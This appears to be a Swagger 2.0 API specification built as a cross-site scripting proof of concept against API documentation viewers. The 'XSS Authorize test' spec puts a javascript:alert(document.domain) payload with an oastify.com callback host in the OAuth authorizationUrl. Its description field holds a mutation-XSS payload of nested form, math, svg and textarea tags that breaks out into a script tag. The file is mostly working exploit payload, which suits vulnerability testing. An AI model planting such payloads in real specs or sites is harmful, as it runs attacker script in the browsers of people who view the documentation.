swagger: "2.0"
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: hdy9f6co4267ouopbsao3br2ltrkfa3z.oastify.com/javascript:alert(document.domain)//
info:
  version: "2.0"
  title: XSS Authorize test
  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script> alert(document.domain)</script>"></form>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
